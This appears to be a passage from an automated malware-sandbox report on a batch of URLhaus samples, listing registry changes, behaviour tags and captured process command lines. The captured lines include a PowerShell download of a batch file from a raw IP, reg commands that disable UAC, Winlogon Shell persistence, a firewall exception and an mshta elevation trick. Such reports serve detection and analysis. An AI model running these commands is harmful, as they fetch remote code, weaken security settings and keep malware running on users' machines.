| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5} | C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5}\Compatibility Flags = "1024" | C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Ammyy\Admin | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr3 = d20de67af3c8613f60eb5e1827463522feaf35eeeeef2f258ba3d2055017810f076911ebb8d1afea1c84c804050f931dee18e328257912f1081cf2c7f12d401526cd10c6cf962825921bdf | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133772324680587466" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr = 537d567366087c6658524c17525304175142701eb36b | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Ammyy | C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\take3.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\SoftwareSASGeneration = "1" | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | N/A |
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\take3.exe
"C:\Users\Admin\AppData\Local\Temp\take3.exe"
C:\Users\Admin\AppData\Local\Temp\take3.exe
"C:\Users\Admin\AppData\Local\Temp\take3.exe"
C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
"C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe"
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\paste.ps1"
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe
"C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe"
C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"
C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
"C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5076 -ip 5076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 536
C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe
"C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe
"C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe"
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffb26c2cc40,0x7ffb26c2cc4c,0x7ffb26c2cc58
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe" -service -lunch
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2140 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2232,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2428 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3168 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3204 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4488,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4500 /prefetch:1
C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe
"C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\Windows Security Health Host.exe,"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 9
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4860,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4908 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4932,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4936 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 9 > nul && copy "C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe" "C:\Users\Admin\Music\Windows Security Health Host.exe" && ping 127.0.0.1 -n 9 > nul && "C:\Users\Admin\Music\Windows Security Health Host.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 9
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4964,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4688 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4664,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5108 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4916,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4524 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4484,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4652 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4632,i,4950023857485398833,4477196716852550287,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5244 /prefetch:2
C:\Users\Admin\Downloads\UrlHausFiles\unik.exe
"C:\Users\Admin\Downloads\UrlHausFiles\unik.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xdc,0x100,0x104,0x7c,0x108,0x7ffb26c346f8,0x7ffb26c34708,0x7ffb26c34718
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\Windows Security Health Host.exe,"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 9
C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe
"C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2192,8819934899075661970,13254746193738217163,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe"
C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe
"C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe"
C:\Users\Admin\Music\Windows Security Health Host.exe
"C:\Users\Admin\Music\Windows Security Health Host.exe"
C:\Users\Admin\Music\Windows Security Health Host.exe
"C:\Users\Admin\Music\Windows Security Health Host.exe"
C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe
"C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4fc 0x2ec
C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe
"C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7848.tmp\7849.tmp\784A.bat C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"
C:\Windows\system32\mshta.exe
mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE
"C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE" goto :target
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7A1D.tmp\7A1E.tmp\7A1F.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE goto :target"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
C:\Windows\system32\reg.exe
reg query HKEY_CLASSES_ROOT\http\shell\open\command
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
C:\Windows\system32\attrib.exe
attrib +s +h d:\net
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb265946f8,0x7ffb26594708,0x7ffb26594718
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
